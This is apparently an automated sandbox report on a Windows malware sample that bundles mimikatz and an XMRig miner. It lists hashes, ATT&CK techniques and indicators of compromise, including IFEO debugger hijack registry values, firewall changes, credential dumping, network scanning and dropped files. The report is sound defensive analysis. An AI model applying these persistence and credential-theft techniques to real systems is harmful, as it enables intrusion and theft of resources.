mimikatz | 621f0a931552778b89cf73c73dfaed86c69281fd93e18e62245f3eaa7e41ba40

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-12-2024 00:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
Size

9.3MB
MD5

9974279b6c54e744b5f2041d67a9913a
SHA1

99d8a1e1917b73625a4d9310a110451b9f66fd7d
SHA256

621f0a931552778b89cf73c73dfaed86c69281fd93e18e62245f3eaa7e41ba40
SHA512

809bdf833d4a83da3bcd192e2913b21ac3bfd9285cf539e88271056f1519c5eba228426b0733a2bd8b7fa44be68b7afefae5a368b8b5cf483f9550e5b124e76b
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4472 created 2100	4472	ysugeag.exe	38

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (29401) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/2852-179-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-187-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-204-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-217-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-226-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-235-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-246-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-284-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-285-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-300-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-301-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig
behavioral2/memory/2852-307-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/1692-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1692-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023c82-6.dat	mimikatz
behavioral2/memory/516-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3172-138-0x00007FF772B30000-0x00007FF772C1E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ysugeag.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	ysugeag.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ysugeag.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4092	netsh.exe
4044	netsh.exe

Executes dropped EXE 27 IoCs

pid	Process
516	ysugeag.exe
4472	ysugeag.exe
2052	wpcap.exe
220	lufbpnmgs.exe
3172	vfshost.exe
852	msytnnqlg.exe
1892	xohudmc.exe
2732	xchlyg.exe
2852	tlulbk.exe
4740	msytnnqlg.exe
2308	msytnnqlg.exe
1600	msytnnqlg.exe
2040	ysugeag.exe
2164	msytnnqlg.exe
852	msytnnqlg.exe
3480	msytnnqlg.exe
4132	msytnnqlg.exe
1792	msytnnqlg.exe
2632	msytnnqlg.exe
4320	msytnnqlg.exe
376	msytnnqlg.exe
4648	msytnnqlg.exe
4660	msytnnqlg.exe
4048	msytnnqlg.exe
2324	msytnnqlg.exe
212	thkiiirie.exe
1080	ysugeag.exe

Loads dropped DLL 12 IoCs

pid	Process
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
2052	wpcap.exe
220	lufbpnmgs.exe
220	lufbpnmgs.exe
220	lufbpnmgs.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	ifconfig.me
66	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8	ysugeag.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ysugeag.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8	ysugeag.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\xchlyg.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	ysugeag.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ysugeag.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\xchlyg.exe	xohudmc.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cd5-134.dat	upx
behavioral2/memory/3172-136-0x00007FF772B30000-0x00007FF772C1E000-memory.dmp	upx
behavioral2/memory/3172-138-0x00007FF772B30000-0x00007FF772C1E000-memory.dmp	upx
behavioral2/files/0x0007000000023ce0-141.dat	upx
behavioral2/memory/852-142-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/852-146-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/files/0x0007000000023cdd-159.dat	upx
behavioral2/memory/2852-160-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/4740-172-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2308-176-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2852-179-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/1600-181-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2852-187-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2164-190-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/852-194-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/3480-198-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/4132-202-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2852-204-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/1792-207-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2632-211-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/4320-215-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2852-217-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/376-220-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/4648-224-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2852-226-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/4660-229-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/4048-232-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2324-234-0x00007FF6074B0000-0x00007FF60750B000-memory.dmp	upx
behavioral2/memory/2852-235-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2852-246-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2852-284-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2852-285-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2852-300-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2852-301-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx
behavioral2/memory/2852-307-0x00007FF7A8860000-0x00007FF7A8980000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\ryivyizlv\UnattendGC\specials\vimpcsvc.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\docmicfg.xml	ysugeag.exe
File opened for modification	C:\Windows\wuzfiigi\docmicfg.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\Shellcode.ini	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\svschost.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\AppCapture32.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\ip.txt	ysugeag.exe
File opened for modification	C:\Windows\wuzfiigi\ysugeag.exe	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\libeay32.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\tucl-1.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\spoolsrv.xml	ysugeag.exe
File created	C:\Windows\wuzfiigi\svschost.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\scan.bat	ysugeag.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\thkiiirie.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\docmicfg.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\spoolsrv.xml	ysugeag.exe
File created	C:\Windows\wuzfiigi\spoolsrv.xml	ysugeag.exe
File opened for modification	C:\Windows\wuzfiigi\spoolsrv.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\wpcap.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\trch-1.dll	ysugeag.exe
File opened for modification	C:\Windows\ryivyizlv\Corporate\log.txt	cmd.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\lufbpnmgs.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\ssleay32.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\spoolsrv.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\schoedcl.xml	ysugeag.exe
File created	C:\Windows\wuzfiigi\docmicfg.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\wpcap.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\trfo-2.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\vimpcsvc.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\vstkqubjh\Packet.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\ucl.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\xdvl-0.dll	ysugeag.exe
File created	C:\Windows\wuzfiigi\schoedcl.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\Corporate\mimidrv.sys	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\docmicfg.exe	ysugeag.exe
File opened for modification	C:\Windows\wuzfiigi\schoedcl.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\Corporate\mimilib.dll	ysugeag.exe
File created	C:\Windows\ime\ysugeag.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\coli-0.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\crli-0.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\zlib1.dll	ysugeag.exe
File created	C:\Windows\wuzfiigi\vimpcsvc.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\AppCapture64.dll	ysugeag.exe
File opened for modification	C:\Windows\ryivyizlv\vstkqubjh\Packet.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\cnli-1.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\svschost.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\svschost.xml	ysugeag.exe
File opened for modification	C:\Windows\ryivyizlv\vstkqubjh\Result.txt	thkiiirie.exe
File created	C:\Windows\wuzfiigi\ysugeag.exe	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\libxml2.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\schoedcl.exe	ysugeag.exe
File opened for modification	C:\Windows\wuzfiigi\vimpcsvc.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\Corporate\vfshost.exe	ysugeag.exe
File created	C:\Windows\ryivyizlv\upbdrjv\swrpwe.exe	ysugeag.exe
File opened for modification	C:\Windows\wuzfiigi\svschost.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\exma-1.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\posh-0.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\tibe-2.dll	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\vimpcsvc.xml	ysugeag.exe
File created	C:\Windows\ryivyizlv\UnattendGC\specials\schoedcl.xml	ysugeag.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4716	sc.exe
436	sc.exe
4016	sc.exe
1620	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
